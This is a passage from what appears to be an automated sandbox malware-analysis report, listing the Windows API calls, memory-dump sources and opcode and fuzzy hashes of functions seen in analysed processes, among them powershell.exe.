                                                                                            • Opcode Fuzzy Hash: 072bae3db9e3bafb013b2cec0c549bb13309727e4919d5ad12cbbab9c36f0455
                                                                                            • Instruction Fuzzy Hash: 0601D135404344CFEB50DF55DC85BA2FB94EF00724F58C0ABCE088F242D679A814CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02891116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 9eaf9250fb40d62cf8683baa3aa258d57e2c5fd80cfe7c7f4d7998db102f41a3
                                                                                            • Instruction ID: 3601d19390f68a26e83651a7df12ff9d626d0216ca5fc68019bbbd7abb570dfc
                                                                                            • Opcode Fuzzy Hash: 9eaf9250fb40d62cf8683baa3aa258d57e2c5fd80cfe7c7f4d7998db102f41a3
                                                                                            • Instruction Fuzzy Hash: EEF0FF38508744EFEF20CF05D889765FBA0EF00A21F08C09ADD4D8B352C675A448CEA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 004CA39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: a7f5bb8d84a6b147f7e9c2adff9cb7f89711790683b69d759aae08dbce2d76c1
                                                                                            • Instruction ID: 6be4b2c8739070dc9b9373680e9f624374d19a4b47ff7b8564a82b381d8fe92e
                                                                                            • Opcode Fuzzy Hash: a7f5bb8d84a6b147f7e9c2adff9cb7f89711790683b69d759aae08dbce2d76c1
                                                                                            • Instruction Fuzzy Hash: 8EF0FF38504384CFEB20CF05D885B65FBA0EF00724F18C09BCD094B322D379A828CAA3
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 004CAA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: acafcea289ba6bceea4247625611581987c2bdb04056f33b2c68d6255c459ff3
                                                                                            • Instruction ID: 696b551098af3a82858143b3cc5f7d353b363e95ae2399a7277651bd33b3c36b
                                                                                            • Opcode Fuzzy Hash: acafcea289ba6bceea4247625611581987c2bdb04056f33b2c68d6255c459ff3
                                                                                            • Instruction Fuzzy Hash: FDF0C235504744CFEB50CF15D985B61FB90DF04725F58C09BDD094B342D27AA914CAA3
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 004CA9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: fae1abe880660c4956d2bf581cd3b2e3024a68b7ede4d552dba70b8c6f5fd422
                                                                                            • Instruction ID: 6f9bb952a355af0b27e719a31fb28fbc3b546b3f32f80f45d00e547c640f7113
                                                                                            • Opcode Fuzzy Hash: fae1abe880660c4956d2bf581cd3b2e3024a68b7ede4d552dba70b8c6f5fd422
                                                                                            • Instruction Fuzzy Hash: E011A3755093849FDB11CF25DC89B96FFA4DF02224F0980EFED85CB252D275A818CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 004CA9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: f4f98fc3294a9b114c3d01514cc39aa7900216bb0dc91161117a8f3ccbb31158
                                                                                            • Instruction ID: d9c1627bcd04b82266a98ae7e7acb2266236e6c82a171b2bab5ee6e7ff687b6b
                                                                                            • Opcode Fuzzy Hash: f4f98fc3294a9b114c3d01514cc39aa7900216bb0dc91161117a8f3ccbb31158
                                                                                            • Instruction Fuzzy Hash: 0701DF75500744CFEB50DF15D88ABA6FB94DF00324F18C4AFDD0A8B242D67AA814CB66
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05650860, Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2113203581.0000000005650000.00000040.00000001.sdmp, Offset: 05650000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2aa4e418a102c9989474bb354c2cad0457da2c788a7fa728a992a2efd792dc38
                                                                                            • Instruction ID: 8f849ed69c3e923f8b6992ccbbd9007c291d0c173cd17a89be1476f20ed95916
                                                                                            • Opcode Fuzzy Hash: 2aa4e418a102c9989474bb354c2cad0457da2c788a7fa728a992a2efd792dc38
                                                                                            • Instruction Fuzzy Hash: 60F0E52221E3C04FC303533898A4A447F724EC752070A01EBD185CB1E7E9544C48C366
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F7081E, Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097969899.0000000001F70000.00000040.00000040.sdmp, Offset: 01F70000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dd4d57793b9f8c678c77717a92aca040a3efeff686ff8a8c9bea3771b9f5680e
                                                                                            • Instruction ID: b8eb0f78b0de96403a41f8d7fb87ad77bee2758aba1093e7f4494f77066012cb
                                                                                            • Opcode Fuzzy Hash: dd4d57793b9f8c678c77717a92aca040a3efeff686ff8a8c9bea3771b9f5680e
                                                                                            • Instruction Fuzzy Hash: F8E092766047008BDB50CF0AEC81462F794EB84A30B58C07FDC0D8B701D536B518CAA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004C23F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097322859.00000000004C2000.00000040.00000001.sdmp, Offset: 004C2000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 26ea3325131af34cacfb2e6066ccaa6aed15624d9fb64eadb27ddce36b20275f
                                                                                            • Instruction ID: 607aaf39fec8da106f553fc55d09270405a5c6b3d7af3cf65736dc9db23f5302
                                                                                            • Opcode Fuzzy Hash: 26ea3325131af34cacfb2e6066ccaa6aed15624d9fb64eadb27ddce36b20275f
                                                                                            • Instruction Fuzzy Hash: BFD05E7D204A918FD71A8A1CC2A4F9637A4AF55B04F4644FEE840CB7A3C7A8E981D204
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004C23BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097322859.00000000004C2000.00000040.00000001.sdmp, Offset: 004C2000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f428e132073241899ab214e3375d265a3fa0280c71f42c34a89602db1bc6476a
                                                                                            • Instruction ID: 6cdd85c2defc3b303cc3ac02bca7804afc47dc254d4b995cc5a94b7752e864d1
                                                                                            • Opcode Fuzzy Hash: f428e132073241899ab214e3375d265a3fa0280c71f42c34a89602db1bc6476a
                                                                                            • Instruction Fuzzy Hash: DAD05E383006818FDB15CA2CC294F5A73E4AF40700F0644EDBC008B376C3ECE880C604
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 2408 Parent PID: 1696 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 01C2ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01C2AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 4c788b54c1d2003bf2759f87eeddc9f522b67602b0d8f583acca2614c51bf3d7
                                                                                            • Instruction ID: 4bea5e43d8909a97b7de7e990afa86eca0cd3fc262d5d9e9594ec311dfc6ea33
                                                                                            • Opcode Fuzzy Hash: 4c788b54c1d2003bf2759f87eeddc9f522b67602b0d8f583acca2614c51bf3d7
                                                                                            • Instruction Fuzzy Hash: AD21BF765097849FEB238F25DC44B92BFB4EF06310F08859AE9858B563D231D908DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01C2AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: f9b8429c6bb57eddb0e2e0d7c689112d28d9a373df68d72fa9acf0ddfc3064a4
                                                                                            • Instruction ID: 0de550188d299b9a8989c62b890cdd1f675e4a84eeb2b3ea3d266c6e526928f2
                                                                                            • Opcode Fuzzy Hash: f9b8429c6bb57eddb0e2e0d7c689112d28d9a373df68d72fa9acf0ddfc3064a4
                                                                                            • Instruction Fuzzy Hash: D8114C75500604DFEB218F55D884B66FBE4EB04321F0885AAED498BA62D231E514DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01C2B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 677abc420558842055fb02e298e7372d7471d3e6252031d909f391a721814d0b
                                                                                            • Instruction ID: 6b8308a408c8cedc7c54e5b56b5461584d5d471992f3c92b1bcadf44df00a671
                                                                                            • Opcode Fuzzy Hash: 677abc420558842055fb02e298e7372d7471d3e6252031d909f391a721814d0b
                                                                                            • Instruction Fuzzy Hash: F111A071508784AFDB228F15DC45F62FFB4EF06220F09849EED854B663C275A918DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01C2B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: eac3a9355febcb5e16a5e57de441bb8c8347a2f5be068f560efca1735bc20d48
                                                                                            • Instruction ID: b8e797c8cf200eff651037b278cb85dd18cce0b2ec126b0a2e2ceaac736bc423
                                                                                            • Opcode Fuzzy Hash: eac3a9355febcb5e16a5e57de441bb8c8347a2f5be068f560efca1735bc20d48
                                                                                            • Instruction Fuzzy Hash: 2C01AD32400704DFEB218F49D885B22FBA0EF08B20F08C59ADD890B612C671E918DBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 021D01D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 7bc8c2609c266203ec08b1fddcb63e2092a459f8db453d89474af6553919365d
                                                                                            • Instruction ID: c502333fea87062d3c99a151908defff50249f06051e731e477db646d8328844
                                                                                            • Opcode Fuzzy Hash: 7bc8c2609c266203ec08b1fddcb63e2092a459f8db453d89474af6553919365d
                                                                                            • Instruction Fuzzy Hash: 0531576654E3C08FE7138B759C65692BFB4AF07310F0E84DBD884CF1A3D6299809DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 021D072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 6139c127bc6717876dea15543c7324685c845383ee2448c09c07aded3619879c
                                                                                            • Instruction ID: 7b25e85ebc2c0357573dfef0522b55417ee06ca95b393aa76dfcf9de62760b76
                                                                                            • Opcode Fuzzy Hash: 6139c127bc6717876dea15543c7324685c845383ee2448c09c07aded3619879c
                                                                                            • Instruction Fuzzy Hash: 9A315075509380AFE722CF65CC45F56BFF8EF09310F09859EE9858B292D365A908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 021D0DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 36505319220054056745cd558fb52280f1e907619b61b118646b24af2753a79a
                                                                                            • Instruction ID: 49f0b336d877d0c38c1a9a1f3f56fb364c0a36aec0052465949bfd67240ee13c
                                                                                            • Opcode Fuzzy Hash: 36505319220054056745cd558fb52280f1e907619b61b118646b24af2753a79a
                                                                                            • Instruction Fuzzy Hash: 7F31C5B1509780AFE722CB25DC45B96BFE8DF06314F1884AAE984CF293D375A905C772
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 01C2BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: e528ca329e0bb6e18a5a876436bf8a110056d4a9897af3ad275c0ca8c8c08c84
                                                                                            • Instruction ID: 5e337ff3a30182cdc7ec23ad427f13c47e3e112a90f50e857a21600afc8eb262
                                                                                            • Opcode Fuzzy Hash: e528ca329e0bb6e18a5a876436bf8a110056d4a9897af3ad275c0ca8c8c08c84
                                                                                            • Instruction Fuzzy Hash: F331B471009380AFEB22CB60CC45F96BFB8EF06210F08859BE985DB193D225A908C7A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 01C2AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 069199751b80f741d50bf1b0a3a41127f083deae3c7dd200a9633848c8de6292
                                                                                            • Instruction ID: 1f97edbea1c58ee52993120e498c4ea1a3a4c0f4eb073d25afe86803c62043bf
                                                                                            • Opcode Fuzzy Hash: 069199751b80f741d50bf1b0a3a41127f083deae3c7dd200a9633848c8de6292
                                                                                            • Instruction Fuzzy Hash: F421D5B2509380AFEB138B60DC45B96BFB8EF06320F0885DBE984DB193C2659905C761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 021D109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 5d9222f18ab216774554eecfabf83b6cea3c54c9f2a54bf1d7499f1b4ec6d6ee
                                                                                            • Instruction ID: a88f23957335c6f10d1d6e214f91f604468938ef1fe5011ddab415ee627c09ed
                                                                                            • Opcode Fuzzy Hash: 5d9222f18ab216774554eecfabf83b6cea3c54c9f2a54bf1d7499f1b4ec6d6ee
                                                                                            • Instruction Fuzzy Hash: E631737550E3C05FD7138B358C55B55BFB4AF43610F1A81DBD884CF1A3D629A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 01C2B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 23897154dcc9f721523030eeb03f13e6ff181a32ce733120bb4814146626674f
                                                                                            • Instruction ID: acce3891c99628e73ed84b899d924918ae1ae79caa48240ee88d39af1d4d489d
                                                                                            • Opcode Fuzzy Hash: 23897154dcc9f721523030eeb03f13e6ff181a32ce733120bb4814146626674f
                                                                                            • Instruction Fuzzy Hash: 042191B1509380EFE722CB15CC45FA6BFA8EF06220F08849AE945DB152D668E948CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01C2A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 31096f7c115b19b35b32c4afb54b313f3e3898f4953dd316792d35bca336c262
                                                                                            • Instruction ID: e4ac34cfe4f1348d41d1454f0064b8d22505d9e15dc7077ed63a779cc7866cf9
                                                                                            • Opcode Fuzzy Hash: 31096f7c115b19b35b32c4afb54b313f3e3898f4953dd316792d35bca336c262
                                                                                            • Instruction Fuzzy Hash: 7E21B27144D3C0AFD312CB258C55B66BFB4EF47620F1981DBD8848F293D229A919CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 021D0819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: e3a01407486a12593cc15278880e93bcd22d0d1132d6d67954e12fff07e584f7
                                                                                            • Instruction ID: 2e7b50ee8bc00a1636e1015296fc897b09e1a35293eafe23a13cc32a28be4284
                                                                                            • Opcode Fuzzy Hash: e3a01407486a12593cc15278880e93bcd22d0d1132d6d67954e12fff07e584f7
                                                                                            • Instruction Fuzzy Hash: 1C210AB6848780AFE712CB159C41FA3BFA8EF46720F0981DBF9858B193D324A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 021D0502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 68e0e9f5baa529b20e31b423967d6a466c271bb89b8b87e7b36da4247575a3bb
                                                                                            • Instruction ID: 274a75795485bafb3c9c08f0e99ba3411a5e86120513671200ae70f582867132
                                                                                            • Opcode Fuzzy Hash: 68e0e9f5baa529b20e31b423967d6a466c271bb89b8b87e7b36da4247575a3bb
                                                                                            • Instruction Fuzzy Hash: 63216D7540E7C0AFD7128B358C55B62BFB4EF47610F1A81CBD8848F6A3D225A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 021D072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: dcc15ae6fd01976d1d594b60ec27a3f3efd32696f4fd27108c88b130958d5b7c
                                                                                            • Instruction ID: b99ea60fcd0ad09642cfc326d2626d760c374f0b2522fb0f288ba3afa5fcb0fa
                                                                                            • Opcode Fuzzy Hash: dcc15ae6fd01976d1d594b60ec27a3f3efd32696f4fd27108c88b130958d5b7c
                                                                                            • Instruction Fuzzy Hash: 91217A71500704EFEB21DF65CC85B66FBE8EF08750F04856AE9898A292D771E908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 021D08E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 6e16f81dfb33baca3b45d385d62386646920dfb17a461d81ead17771d9c86c98
                                                                                            • Instruction ID: cc8b19025b9b1e3ccd55b07d5da3dcbca21d9447bc3e415975097fefa15531b0
                                                                                            • Opcode Fuzzy Hash: 6e16f81dfb33baca3b45d385d62386646920dfb17a461d81ead17771d9c86c98
                                                                                            • Instruction Fuzzy Hash: C7219271409380AFEB22CF61DC45F56BFB8EF06314F09859BE9849B153C265A909CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01C2A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 289f376106e2d11aa2a270d1e10683afe91cc9f99560b6f85fbb507c1012a4ec
                                                                                            • Instruction ID: 78e5a4122d884794b03a58b2fd21067947542c6a1864cfd2001537de5cfef8d1
                                                                                            • Opcode Fuzzy Hash: 289f376106e2d11aa2a270d1e10683afe91cc9f99560b6f85fbb507c1012a4ec
                                                                                            • Instruction Fuzzy Hash: 0E21A77540D780AFD3138B25DC51B62BFB4EF87710F1981DBE8848B653D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 021D0DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: f4881ccd4fde56984015c5310fa7b58601e28d0391bb5e6738d042a4ec16bc07
                                                                                            • Instruction ID: 55cf179ba89a624f1bdde596989a42220f356442afa2671f7b921bcebb76efe0
                                                                                            • Opcode Fuzzy Hash: f4881ccd4fde56984015c5310fa7b58601e28d0391bb5e6738d042a4ec16bc07
                                                                                            • Instruction Fuzzy Hash: 9F21A171540740EFF720DF25CC85BA6FBD8EF08310F14846AE948DB282D776E804CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 01C2BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 2b4223be450e43ab8206c88d8661af81bf1fe4c0b004956fbad618c05dabc7b9
                                                                                            • Instruction ID: c65411c45f808877d41a20936a33a0a26c2e648fa71a7196956e297358781e36
                                                                                            • Opcode Fuzzy Hash: 2b4223be450e43ab8206c88d8661af81bf1fe4c0b004956fbad618c05dabc7b9
                                                                                            • Instruction Fuzzy Hash: AC119D72500704EFEB21CF65DC85FAAFBA8EF04720F14896AF9459A141D671E9448BB2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

